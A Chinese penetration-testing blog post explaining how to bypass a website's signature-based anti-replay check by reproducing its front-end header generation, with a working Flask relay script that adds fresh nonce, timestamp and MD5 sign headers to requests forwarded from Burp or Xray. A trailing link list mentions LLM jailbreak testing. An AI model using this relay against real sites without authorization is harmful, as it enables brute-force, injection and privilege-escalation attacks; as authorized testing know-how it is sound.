突破sign签名校验实现请求重放

对于安全性较高的网站,通常会用到sign签名来实现多重验证,常见的有:

  1. sign对加密密钥验证(后面会介绍)
  2. 通过sign对请求重放验证(该文章重点介绍sign请求重放验证)

在渗透测试中,重放数据包是非常重要的测试条件,大多数功能都需要通过重放来测试,像爆破、sql注入、篡改参数实现越权等等;而开发者通常采用的限制方法就是禁止请求重放

有些网站每次请求通过增加随机nonce请求头来校验限制请求重放,我们首先可以测试修改nocnce的植来测试是否能够绕过限制,在这次案例中并不能绕过,在以前的渗透测试中我确实有碰到过修改nonce就可以绕过重放

案例:请求重放失败

在该案例中我们可以看见有sign值,同时还有timestamp、X-CTG-Request-ID、X-Request-Time等等,熟悉sign签名的都知道,这些值都会与sign有关联的。这些值每次请求都是不一样的,我们更改数据包重放请求的时候这些值不会变,就会导致重放失败,当然随机修改值也是无效的,比如我修改sign的值提示了签名信息不正确

而后端怎么校验我们是不知道的,我们只需要知道一点:后端校验的这些值都是前端发送过去的,这些值肯定都是在前端生成的,我们只需要找到这些值的生成方法,在每次请求中使用我们自己生成的值即可绕过

1、前端搜索关键字,找到生成方式,通过前端我们就可以分析到每个请求头的生成方式,对于懂JS的人就会相当简单(需要JS基础,后续有时间我会详细分析,这里就不再分析了)

2、根据每个请求头的生成方式用python编写请求中转脚本(只要是处理bp的请求,接收bp的每个请求,自动在请求包的HTTP头中添加指定的请求头信息,比如随机的sign,再向目标 URL 发送请求,最后将响应结果返回给bp展示,以达到绕过重放)

使用flask框架

复制代码
import hashlib
import json
import uuid
from datetime import datetime

import requests
from flask import Flask, request

app = Flask(__name__)
app.config['JSON_AS_ASCII'] = False


# 请求处理
@app.before_request
def incoming_request():
    header = dict(request.headers.items())

    nonce = uuid.uuid4()
    timestamp = datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S')
    sign_plain = "timestamp=" + timestamp + "&nonce=" + str(nonce) + "&seed=itms"
    sign_md5 = hashlib.md5(sign_plain.encode()).hexdigest()

    header['Nonce'] = str(nonce)
    header['Timestamp'] = timestamp
    header['Sign'] = sign_md5
    header['X-Ctg-Request-Id'] = str(uuid.uuid1())
    header['X-Request-Time'] = str(int(datetime.now().timestamp() * 1000))

    re = requests.post(url=request.url, headers=header, data=request.data)
    re.encoding = 'utf-8'
    try:
        json.loads(re.content)
    except ValueError:
        return re.content
    return re.json()

# X-Ray代理转发到这里
# app.run(host='127.0.0.1', port=xxxx, debug=True)
# Burp代理转发到这里
app.run(host='127.0.0.1', port=12450, debug=True)

bp设置上层代理

然后就可以愉快的请求重放了

未处理的重放失败

处理过的重放成功

同时在脚本日志也可以看到请求

相关推荐
Guheyunyi3 小时前
监测预警系统重塑隧道安全新范式
大数据·运维·人工智能·科技·安全
IT科技那点事儿4 小时前
引领AI安全新时代 Accelerate 2025北亚巡展·北京站成功举办
人工智能·安全
竹言笙熙4 小时前
Polarctf2025夏季赛 web java ez_check
java·学习·web安全
lubiii_7 小时前
SQL手工测试(MySQL数据库)
数据库·mysql·web安全·网络安全
恰薯条的屑海鸥9 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十四期-XXE模块)
网络·学习·安全·web安全·渗透测试
20242817李臻9 小时前
20242817李臻-安全文件传输系统-项目验收
数据库·安全
DevSecOps选型指南17 小时前
2025软件供应链安全最佳实践︱证券DevSecOps下供应链与开源治理实践
网络·安全·web安全·开源·代码审计·软件供应链安全
ABB自动化17 小时前
for AC500 PLCs 3ADR025003M9903的安全说明
服务器·安全·机器人
恰薯条的屑海鸥18 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
阿部多瑞 ABU19 小时前
主流大语言模型安全性测试(三):阿拉伯语越狱提示词下的表现与分析
人工智能·安全·ai·语言模型·安全性测试